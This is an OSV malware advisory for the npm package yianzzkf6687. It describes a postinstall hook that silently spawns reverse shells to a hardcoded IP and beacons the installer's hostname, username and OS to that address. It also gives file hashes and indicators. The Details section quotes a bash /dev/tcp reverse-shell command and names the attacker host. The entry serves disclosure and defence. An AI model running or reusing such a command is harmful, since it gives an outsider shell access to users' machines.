MAL-2026-6235

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/yianzzkf6687/MAL-2026-6235.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6235
Published
2026-06-20T03:50:25Z
Modified
2026-06-20T05:16:46.206870145Z
Summary
Malicious code in yianzzkf6687 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9)

On npm install, the postinstall hook (scripts/postinstall.js) detach-spawns scripts/shell.js with detached: true, stdio: 'ignore', windowsHide: true and unref()s it, so the malicious process persists silently after npm install returns. scripts/shell.js hardcodes HOST = '114.67.90.67' and opens reverse shells to that IP across multiple fallback ports (3334, 4444, 443, 80, 8080, 53) using Node net, bash -c "bash -i >& /dev/tcp/<HOST>/<port> 0>&1", and a Python fallback, then uses setInterval to keep the process alive. It also sends an HTTP GET to http://114.67.90.67:8333/ping with the installer's hostname, username, cwd, and OS platform/release as query parameters, confirming victim acquisition. The package advertises itself as a string-manipulation utility, providing cover for the backdoor. Installing this package gives the operator of 114.67.90.67 interactive shell access on the installer's machine.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-20T03:50:25Z",
            "versions": [
                "1.0.3"
            ],
            "id": "IN-MAL-2026-007092",
            "import_time": "2026-06-20T04:58:37.570611768Z"
        }
    ]
}

Affected packages

npm / yianzzkf6687

Affected versions

1.*
1.0.3

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/yianzzkf6687/MAL-2026-6235.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "9a9278d74630388e996735bb2e778f572010a2952c9304495f41cbd43adbecee",
            "tlsh": "7081a5b445ba442d3377975f820b103163aba1072d1ae6a836bc53436fd2dbc5863af4",
            "path": "scripts/shell.js"
        },
        {
            "sha256": "20d2859a52b6f2bf12083b85a9332ef9c4be9dbdceab735e0789c7f15bb5a5c7",
            "tlsh": "b8e0eb2ab3a2023cb1bac7c0bb5a33372a0b9700a3901020c9ae1067078739e81330e7",
            "path": "scripts/postinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-BPpQ4y4/2cqgA6To94RtsJYv4GoLB4803eKmDGgQUTTvSO38CAaFprcCOmY0A9y5jTMUzqEiarNGay1hYyyf0g==",
                "sha1": "46b01418bc3dd1e15c4e2d40f4137973e0809ab1"
            },
            "filename": "yianzzkf6687-1.0.3.tgz"
        }
    ]
}